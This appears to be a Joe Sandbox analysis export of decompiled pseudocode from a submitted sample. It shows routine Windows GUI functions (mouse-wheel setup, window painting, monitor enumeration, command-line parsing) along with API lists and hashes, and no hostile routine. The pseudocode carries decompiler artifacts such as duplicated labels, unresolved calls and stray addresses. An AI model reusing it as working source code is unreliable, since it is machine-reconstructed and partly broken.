                                                                                                                                                                                                                            • String ID: CD-ROM$Fixed$Invalid root path$RAM disk$Remote (network)$Removable$Unknown
                                                                                                                                                                                                                            • API String ID: 2715012092-3183225172
                                                                                                                                                                                                                            • Opcode ID: 37c26c7b6a36cc69744da4cbf0bf51d39395402c06865476361514b269898c34
                                                                                                                                                                                                                            • Instruction ID: 8332d3c0b4ea855eee04026cb9a70cd7c2c9abd5e967455e7ab158e986997913
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c26c7b6a36cc69744da4cbf0bf51d39395402c06865476361514b269898c34
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2516574A041099BC700FBA1C4459FEB379EBD5314BA1C1BBE929B3741D73C9E868A1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407B3C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				struct HWND__* _t19;
                                                                                                                                                                                                                            				int* _t20;
                                                                                                                                                                                                                            				int* _t26;
                                                                                                                                                                                                                            				int* _t27;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t26 = _t20;
                                                                                                                                                                                                                            				_t27 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                                                                                                                                                                                                            				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                                                                                                                                                                                            				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                                                                                                                                                                                                            				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                                                                                                                                                                                                            				if( *_t27 == 0 || _t19 == 0) {
                                                                                                                                                                                                                            					 *_a8 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *_t26 == 0 || _t19 == 0) {
                                                                                                                                                                                                                            					 *_a4 = 3;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t19;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                                                                                                                                            • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                                                                                                                                            • API String ID: 1416857345-3736581797
                                                                                                                                                                                                                            • Opcode ID: a430df52fef8c432dba606b690dc2a5b7376c3b23e3569d5b0345d39821fca1a
                                                                                                                                                                                                                            • Instruction ID: 32a8b66fc92957f21ca9bbef851e7a8d2f13c74dcc19ac79790c4ff9c798c5cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a430df52fef8c432dba606b690dc2a5b7376c3b23e3569d5b0345d39821fca1a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49112471A48301AFE310AF55CC45F66B7E8EF45754F208436B944AB3C1D6B8BD40C7AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				struct HDC__* _v12;
                                                                                                                                                                                                                            				struct tagRECT _v28;
                                                                                                                                                                                                                            				struct tagRECT _v44;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				signed char _t43;
                                                                                                                                                                                                                            				struct HDC__* _t55;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				int _t79;
                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                            				void* _t120;
                                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                                            				intOrPtr _t123;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t120 = _t122;
                                                                                                                                                                                                                            				_t123 = _t122 + 0xffffffbc;
                                                                                                                                                                                                                            				_t92 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t114 = __eax;
                                                                                                                                                                                                                            				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
                                                                                                                                                                                                                            				if((_t43 & 0x00000002) == 0) {
                                                                                                                                                                                                                            					return _t43;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					GetWindowRect(E00441704(_v8),  &_v44);
                                                                                                                                                                                                                            					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                                                                                                                                                                                                            					_t55 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t55);
                                                                                                                                                                                                                            					L00407730();
                                                                                                                                                                                                                            					_v12 = _t55;
                                                                                                                                                                                                                            					_push(_t120);
                                                                                                                                                                                                                            					_push(0x433063);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t123;
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					_t117 = _t114;
                                                                                                                                                                                                                            					if(_t92 != 0) {
                                                                                                                                                                                                                            						_t77 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                                                                                                                                                                                            						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
                                                                                                                                                                                                                            							GetSystemMetrics(2);
                                                                                                                                                                                                                            							_t79 = GetSystemMetrics(3);
                                                                                                                                                                                                                            							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                                                                                                                                                                                                            							E00419804(_v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							_t117 = _t117;
                                                                                                                                                                                                                            							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                                                                                                                                                                                                            					E00432B40( &_v56, 2);
                                                                                                                                                                                                                            					E00432A94(_t117,  &_v56, _v12, 0,  &_v44);
                                                                                                                                                                                                                            					_pop(_t105);
                                                                                                                                                                                                                            					 *[fs:eax] = _t105;
                                                                                                                                                                                                                            					_push(0x43306a);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_t74 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t74);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t74;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F23
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00432F3E
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F92
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FA7
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FB0
                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00432FFA
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,0043306A,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043305D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3936689491-0
                                                                                                                                                                                                                            • Opcode ID: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                                                                                                                                                                                            • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                                                                                                                                                                                            				struct tagPOINT _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                                                                            				struct tagRECT _v48;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				int _t61;
                                                                                                                                                                                                                            				RECT* _t64;
                                                                                                                                                                                                                            				struct HDC__* _t65;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t64 = _a8;
                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92f != 0) {
                                                                                                                                                                                                                            					_t61 = 0;
                                                                                                                                                                                                                            					if(_a12 == 0) {
                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                            						return _t61;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v32.left = 0;
                                                                                                                                                                                                                            					_v32.top = 0;
                                                                                                                                                                                                                            					_v32.right = GetSystemMetrics(0);
                                                                                                                                                                                                                            					_v32.bottom = GetSystemMetrics(1);
                                                                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                                                                            						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                                                                                                                                                            							L13:
                                                                                                                                                                                                                            							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t61 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v16 = GetClipBox(_t65,  &_v48);
                                                                                                                                                                                                                            					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                                                                                                                                                                                            					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                                                                                                                                                                                            						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_v16 == 1) {
                                                                                                                                                                                                                            							_t61 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
                                                                                                                                                                                                                            				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                                                                                                                                                                                            				goto L14;
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB06
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB11
                                                                                                                                                                                                                            • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                                                                                                                                                                                            • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB5A
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB70
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                                                                                                                                            • String ID: EnumDisplayMonitors
                                                                                                                                                                                                                            • API String ID: 362875416-2491903729
                                                                                                                                                                                                                            • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E0043F894(intOrPtr* __eax, void* __edx) {
                                                                                                                                                                                                                            				struct HDC__* _v8;
                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				struct tagPAINTSTRUCT _v80;
                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                            				void* _v96;
                                                                                                                                                                                                                            				struct HDC__* _v104;
                                                                                                                                                                                                                            				void* _v112;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				struct HDC__* _t47;
                                                                                                                                                                                                                            				struct HDC__* _t55;
                                                                                                                                                                                                                            				intOrPtr* _t83;
                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            				void* _t113;
                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t111 = _t113;
                                                                                                                                                                                                                            				_t114 = _t113 + 0xffffff94;
                                                                                                                                                                                                                            				_push(_t103);
                                                                                                                                                                                                                            				_t108 = __edx;
                                                                                                                                                                                                                            				_t83 = __eax;
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                                                                                                                                                                                                            					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0043E434(_t83) != 0) {
                                                                                                                                                                                                                            						_t38 = E0043F3B8(_t83, _t83, _t108, _t103, _t108);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t38;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					L00407638();
                                                                                                                                                                                                                            					 *((intOrPtr*)( *__eax + 0x44))();
                                                                                                                                                                                                                            					 *((intOrPtr*)( *__eax + 0x44))();
                                                                                                                                                                                                                            					_t47 = _v104;
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v12 = _t47;
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_v8 = _t47;
                                                                                                                                                                                                                            					_v16 = SelectObject(_v8, _v12);
                                                                                                                                                                                                                            					 *[fs:eax] = _t114;
                                                                                                                                                                                                                            					_t55 = BeginPaint(E00441704(_t83),  &_v80);
                                                                                                                                                                                                                            					E0043C130(_t83, _v8, 0x14, _v8);
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t108 + 4)) = _v8;
                                                                                                                                                                                                                            					E0043F894(_t83, _t108);
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t108 + 4)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43f9e6, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
                                                                                                                                                                                                                            					_push(_v104);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L004072B8();
                                                                                                                                                                                                                            					EndPaint(E00441704(_t83),  &_v80);
                                                                                                                                                                                                                            					_t102 = _t55;
                                                                                                                                                                                                                            					 *[fs:eax] = _t102;
                                                                                                                                                                                                                            					_push(0x43f9ed);
                                                                                                                                                                                                                            					SelectObject(_v8, _v16);
                                                                                                                                                                                                                            					DeleteDC(_v8);
                                                                                                                                                                                                                            					return DeleteObject(_v12);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0043F8DF
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000000,?), ref: 0043F903
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,?), ref: 0043F90E
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043F915
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0043F925
                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?,00000000,0043F9E6,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F947
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F9A3
                                                                                                                                                                                                                            • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F9B4
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0043F9CE
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0043F9D7
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0043F9E0
                                                                                                                                                                                                                              • Part of subcall function 0043F3B8: BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                                                              • Part of subcall function 0043F3B8: EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Paint$Object$BeginDeleteSelect$A520A590B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2363126454-0
                                                                                                                                                                                                                            • Opcode ID: a75929b2bda56c519e6b116cba9f63e1956fe41b6023f287faae0ba4c9e6ea03
                                                                                                                                                                                                                            • Instruction ID: 40ca658292be7ca8ad05904ab100b4ae2c2721b91c2ab7ac5fced72403dc647e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a75929b2bda56c519e6b116cba9f63e1956fe41b6023f287faae0ba4c9e6ea03
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14414E71F04204AFD704EBA9CD85B9EB7F8AF48304F50447AF909EB281DA78AD09CB55
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
                                                                                                                                                                                                                            				char _t5;
                                                                                                                                                                                                                            				char _t6;
                                                                                                                                                                                                                            				CHAR* _t7;
                                                                                                                                                                                                                            				char _t9;
                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                            				char _t14;
                                                                                                                                                                                                                            				CHAR* _t15;
                                                                                                                                                                                                                            				char _t17;
                                                                                                                                                                                                                            				CHAR* _t19;
                                                                                                                                                                                                                            				CHAR* _t22;
                                                                                                                                                                                                                            				CHAR* _t23;
                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				intOrPtr* _t34;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t34 = __edx;
                                                                                                                                                                                                                            				_t22 = __eax;
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					_t5 =  *_t22;
                                                                                                                                                                                                                            					if(_t5 != 0 && _t5 <= 0x20) {
                                                                                                                                                                                                                            						_t22 = CharNextA(_t22);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					_t5 =  *_t22;
                                                                                                                                                                                                                            					if(_t5 != 0 && _t5 <= 0x20) {
                                                                                                                                                                                                                            						_t22 = CharNextA(_t22);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                                                                                                                                                                                                            						_t36 = 0;
                                                                                                                                                                                                                            						_t32 = _t22;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t6 =  *_t22;
                                                                                                                                                                                                                            							if(_t6 <= 0x20) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t6 != 0x22) {
                                                                                                                                                                                                                            								_t7 = CharNextA(_t22);
                                                                                                                                                                                                                            								_t36 = _t36 + _t7 - _t22;
                                                                                                                                                                                                                            								_t22 = _t7;
                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t22 = CharNextA(_t22);
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t9 =  *_t22;
                                                                                                                                                                                                                            								if(_t9 == 0 || _t9 == 0x22) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t11 = CharNextA(_t22);
                                                                                                                                                                                                                            								_t36 = _t36 + _t11 - _t22;
                                                                                                                                                                                                                            								_t22 = _t11;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *_t22 != 0) {
                                                                                                                                                                                                                            								_t22 = CharNextA(_t22);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E0040500C(_t34, _t36);
                                                                                                                                                                                                                            						_t23 = _t32;
                                                                                                                                                                                                                            						_t33 =  *_t34;
                                                                                                                                                                                                                            						_t35 = 0;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t14 =  *_t23;
                                                                                                                                                                                                                            							if(_t14 <= 0x20) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t14 != 0x22) {
                                                                                                                                                                                                                            								_t15 = CharNextA(_t23);
                                                                                                                                                                                                                            								if(_t15 <= _t23) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L27;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                            									 *((char*)(_t33 + _t35)) =  *_t23;
                                                                                                                                                                                                                            									_t23 =  &(_t23[1]);
                                                                                                                                                                                                                            									_t35 = _t35 + 1;
                                                                                                                                                                                                                            								} while (_t15 > _t23);
                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t23 = CharNextA(_t23);
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t17 =  *_t23;
                                                                                                                                                                                                                            								if(_t17 == 0 || _t17 == 0x22) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t19 = CharNextA(_t23);
                                                                                                                                                                                                                            								if(_t19 <= _t23) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L21;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									L21:
                                                                                                                                                                                                                            									 *((char*)(_t33 + _t35)) =  *_t23;
                                                                                                                                                                                                                            									_t23 =  &(_t23[1]);
                                                                                                                                                                                                                            									_t35 = _t35 + 1;
                                                                                                                                                                                                                            								} while (_t19 > _t23);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *_t23 != 0) {
                                                                                                                                                                                                                            								_t23 = CharNextA(_t23);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						return _t23;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t22 =  &(_t22[2]);
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            0x00402a8d
                                                                                                                                                                                                                            0x00402a8f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a8f
                                                                                                                                                                                                                            0x00402a58
                                                                                                                                                                                                                            0x00402a6a
                                                                                                                                                                                                                            0x00402a6a
                                                                                                                                                                                                                            0x00402a6e
